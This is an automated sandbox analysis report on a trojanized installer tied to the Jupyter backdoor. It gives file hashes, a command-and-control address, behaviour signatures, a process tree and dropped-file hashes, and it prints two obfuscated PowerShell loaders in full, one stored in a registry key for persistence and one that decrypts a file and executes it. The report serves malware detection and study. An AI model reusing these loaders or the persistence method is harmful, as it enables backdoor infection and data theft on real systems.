Analysis
-
max time kernel
148s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2023 00:09
Static task
static1
Behavioral task
behavioral1
Sample
4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe
Resource
win7-20231215-en
General
-
Target
4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe
-
Size
109.4MB
-
MD5
6720015dcacecbfd3e14cfa40fb09464
-
SHA1
e158076552c38ce35f68ad93e292c1c3a1fc4a1c
-
SHA256
4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b
-
SHA512
405ac883e0ee92715abc6c0d8a633045b909f29d1346b246c10e1b8271b336002847df0a2f031c6d83469306ecb6246e4881679babccf92d10e953ff0d7919fa
-
SSDEEP
49152:Cqe3f6iJ+7ZgS9YLPcEcp6NMdFPVGw3mxPo+OOOrWUUFRevTycKArFD0o:bSi0+7ZVObvcpQMVTWxPYPWHFRe2czCo
Malware Config
Extracted
jupyter
AG-1
http://167.88.15.115
Signatures
-
Jupyter Backdoor/Client payload 1 IoCs
resource yara_rule behavioral2/memory/3764-352-0x00000000065F0000-0x0000000006600000-memory.dmp family_jupyter -
Blocklisted process makes network request 2 IoCs
flow pid Process 96 3764 powershell.exe 137 3764 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\miCROsOfT\WINdOwS\StarT menU\pRoGrAms\sTARtUp\ad15d14d3094fdae29ec015c76e6a.LNK powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral2/files/0x0006000000023238-12.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\ldeefmkhvalkun\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\ldeefmkhvalkun powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\ldeefmkhvalkun\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\ldeefmkhvalkun\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\ldeefmkhvalkun\shell\open\command\ = "poWERShELl -WIndOwSTYLe hidden -eP ByPAss -CommaND \"$a0bf505086045a8ff9b25aa4b47c7='QFNDQH5AfDFfTkBWQzZQQHVgOEtAUX04SUB+XjMjQFY9TTNAYHRDSF5PTD1tQFI1c3dAdExmPl5TKiRKXlNHaDBAfipNMkB1Uk1XQHclRmpAfG1ITUBzNkk0P3hkUldwe2w/MHhgTVh5eFVpQSpqLTtnVnZYRnhHZ1BAIThxaylSQHJrJDRAUmcwZjwpZVl8ZnNsYWt2OFI7dWZgWFJ4aD0tKX5pbGVwaWdPN3lydlojdml5cTJRI20kak1sbVcheklsZlNDLXlOOE1MekwySyFud2haa3B7JTl5dUE4THRvdnh6dWluXzF4dzI3NFJ0ZGZ9SWdwY3hycHVoOGBnfCthcnl9c2p2bUdpS3ZvQUpNaHk2VDlJXlFlZX0=';$a775e497d3041b87646d35dfb80e7=[sYsTeM.io.file]::readAllbyTes('C:\\Users\\Admin\\AppData\\Roaming\\mIcroSoFT\\qINgjCMWDeUZfRBOXHu\\scYzgHmnoQkApEBqX.RnJAFfZzwvNKclxt');foR($a6311ffd6e74769bba3f5af84affd=0;$a6311ffd6e74769bba3f5af84affd -lT $a775e497d3041b87646d35dfb80e7.COUNt;){FoR($aee065fab8841fbbea3dfc9988477=0;$aee065fab8841fbbea3dfc9988477 -Lt $a0bf505086045a8ff9b25aa4b47c7.lenGth;$aee065fab8841fbbea3dfc9988477++){$a775e497d3041b87646d35dfb80e7[$a6311ffd6e74769bba3f5af84affd]=$a775e497d3041b87646d35dfb80e7[$a6311ffd6e74769bba3f5af84affd] -bxoR $a0bf505086045a8ff9b25aa4b47c7[$aee065fab8841fbbea3dfc9988477];$a6311ffd6e74769bba3f5af84affd++;If($a6311ffd6e74769bba3f5af84affd -ge $a775e497d3041b87646d35dfb80e7.COuNt){$aee065fab8841fbbea3dfc9988477=$a0bf505086045a8ff9b25aa4b47c7.LENGtH}}};[SYsTeM.REfLeCTion.AssemBlY]::LOAD($a775e497d3041b87646d35dfb80e7);[marS.deimoS]::INtERacT()\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\.quhfezydttabofhszl powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\.quhfezydttabofhszl\ = "ldeefmkhvalkun" powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 4932 AcroRd32.exe 4932 AcroRd32.exe 3764 powershell.exe 3764 powershell.exe 3764 powershell.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3764 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4932 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe 4932 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4896 wrote to memory of 4056 4896 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe 89 PID 4896 wrote to memory of 4056 4896 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe 89 PID 4896 wrote to memory of 4056 4896 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe 89 PID 4056 wrote to memory of 4932 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 90 PID 4056 wrote to memory of 4932 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 90 PID 4056 wrote to memory of 4932 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 90 PID 4932 wrote to memory of 1168 4932 AcroRd32.exe 95 PID 4932 wrote to memory of 1168 4932 AcroRd32.exe 95 PID 4932 wrote to memory of 1168 4932 AcroRd32.exe 95 PID 4056 wrote to memory of 3764 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 97 PID 4056 wrote to memory of 3764 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 97 PID 4056 wrote to memory of 3764 4056 4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp 97 PID 4932 wrote to memory of 3300 4932 AcroRd32.exe 99 PID 4932 wrote to memory of 3300 4932 AcroRd32.exe 99 PID 4932 wrote to memory of 3300 4932 AcroRd32.exe 99 PID 4932 wrote to memory of 4976 4932 AcroRd32.exe 102 PID 4932 wrote to memory of 4976 4932 AcroRd32.exe 102 PID 4932 wrote to memory of 4976 4932 AcroRd32.exe 102 PID 4932 wrote to memory of 5004 4932 AcroRd32.exe 103 PID 4932 wrote to memory of 5004 4932 AcroRd32.exe 103 PID 4932 wrote to memory of 5004 4932 AcroRd32.exe 103 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 2016 4976 RdrCEF.exe 105 PID 4976 wrote to memory of 1096 4976 RdrCEF.exe 106 PID 4976 wrote to memory of 1096 4976 RdrCEF.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe"C:\Users\Admin\AppData\Local\Temp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\is-V9FFP.tmp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp"C:\Users\Admin\AppData\Local\Temp\is-V9FFP.tmp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp" /SL5="$B005E,113775430,817152,C:\Users\Admin\AppData\Local\Temp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ICAT - Data Limitations - 24122020_Altered_ed.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:1168
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:3300
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=88E40A400383A1CF5806B2EF4543E043 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2016
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C2E8E728A49009AC52BDCC4F7CF0609E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C2E8E728A49009AC52BDCC4F7CF0609E --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:15⤵PID:1096
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=00BFFB8BCEB07A5842F77C12AA693DDA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=00BFFB8BCEB07A5842F77C12AA693DDA --renderer-client-id=4 --mojo-platform-channel-handle=2164 --allow-no-sandbox-job /prefetch:15⤵PID:1768
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B106AFD3860552A7C46AC840792E71AF --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3284
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=08A8417FCEB89017F67BA76975383CF4 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2464
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=75403113D5E9D386E66B71F4D734E9FE --mojo-platform-channel-handle=2892 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:5004
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:5004
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$b82a48d763e93c0032fbc4e012f76181='C:\Users\Admin\21975a9525525ddb721cede858806735\9c5a7c66777c99a1f36d9313996b4cbf\7ecadc08b546c21114448602e08e7249\0823c592ad4fda66d9b5cfa1652b2170\24a78507fe4c54294d1c07b7b1a35743\c0aa5c1fe7fde90f15e474c69e8d335a\bb9e8c10eb6d731691da43fd8f1a7e24';$9c191430d07109b94cc97c4138cced7c='qjAfoSEDkutMTIZidJBzsKyNOmGwFpVUPnrhaWHlxvYQLXbRgCec';$aa7bb488146cc360e919c559605283aa=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($b82a48d763e93c0032fbc4e012f76181));remove-item $b82a48d763e93c0032fbc4e012f76181;for($i=0;$i -lt $aa7bb488146cc360e919c559605283aa.count;){for($j=0;$j -lt $9c191430d07109b94cc97c4138cced7c.length;$j++){$aa7bb488146cc360e919c559605283aa[$i]=$aa7bb488146cc360e919c559605283aa[$i] -bxor $9c191430d07109b94cc97c4138cced7c[$j];$i++;if($i -ge $aa7bb488146cc360e919c559605283aa.count){$j=$9c191430d07109b94cc97c4138cced7c.length}}};$aa7bb488146cc360e919c559605283aa=[System.Text.Encoding]::UTF8.GetString($aa7bb488146cc360e919c559605283aa);iex $aa7bb488146cc360e919c559605283aa;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\21975a9525525ddb721cede858806735\9c5a7c66777c99a1f36d9313996b4cbf\7ecadc08b546c21114448602e08e7249\0823c592ad4fda66d9b5cfa1652b2170\24a78507fe4c54294d1c07b7b1a35743\c0aa5c1fe7fde90f15e474c69e8d335a\bb9e8c10eb6d731691da43fd8f1a7e24
Filesize77KB
MD551c59bfeed02152bc8c78bc8ca3956ac
SHA1074a4801fb9fb13af2e56ab5479c0400adfaa39b
SHA2565f5ab5dafaf00c5eb34e01039f6799bec3780c4d68983008ad16931158b6229e
SHA51208899adefa0de23796c4d3773630c4eddb8e2f251bf99a7da67b8d59df7b5120edad83f897272e6d6a9ed7affbdd323ce98771142a398b818bf50e5b9fbc4b23
-
Filesize
64KB
MD5afbd3122743a7cbee94c67a120fd1632
SHA15faa54383feb4f4eef74a1fe09138c1c4ecb5cb2
SHA256369e0ad484c9cd6d811d1bccef54dc6c20d286c2b5fb25509ab722d4bcbc14c5
SHA5125a35d1257bec2e22f17c2e179c728a5136cbe8b9729ac998ea0498350c581f8dc5981a8d363e1e9fd252c5ece1b3ba56f112e268857a65509de43a3918fddff2
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
790KB
MD5b7ea387b801b2209301d5ceeb6b33f91
SHA1449faa8070486dacfbc824b133d11f7de8ea426e
SHA256b83f2f0e54e64788edd318911f7e38e72ac3ebadb934854303206af47bfac8e3
SHA51259ec32d3dbe203c570cf26bc526107928b081db3831796da11d96b4b7d22beb0d764c402f344baf93f5b32961c1b5b93ce7304aea7315d2c0a0f911859562ad4
-
C:\Users\Admin\AppData\Local\Temp\is-V9FFP.tmp\4630b0be7226c9003d34717f7eb092eb51242bd9723d118b4b106c9727503a7b.tmp
Filesize3.0MB
MD57345a1194982254510d32fade75ac616
SHA13d78eb7b18275a826d1d9a0dd85418c40c760caf
SHA256d40da05d477f2a6a0da575194dd9a693f85440e6b2d08d1687e1415ce0b00df7
SHA512ac8c2f286eb3b592281cae698d1d5f8767200c40c2e9ee19d6775c0f913374ce37a88b82c12b5e3cc7b214b63f358dcc59a4728f189c50e104b3406c6b8bf70e
-
Filesize
77KB
MD50660fe005a6e58c33304d90ce97153b0
SHA13a07df299c940227f9bb7c117e4422c2a5509f47
SHA2566c80accf0b58535f84622cbd3e1d5d94b4538e885c21a6f4258f60ec64cb7b1c
SHA512bc81d8d3af1f2a12f51b8d4581854e98c00a0b843840fe418c5f59385a7fc0c968e16fb1d5bdcfe60121ea77ccdbe45e2e880e1bd82950d246494014ad8a311f
-
Filesize
142KB
MD5a2ad0905213b2d4afcc65e02c9168e59
SHA1465f226ebcf287da07749d49cc49ac85266d904c
SHA2569651b95204e1e8686f11dfb10df95da2126d525855d567cd8b83bf9ae9a315db
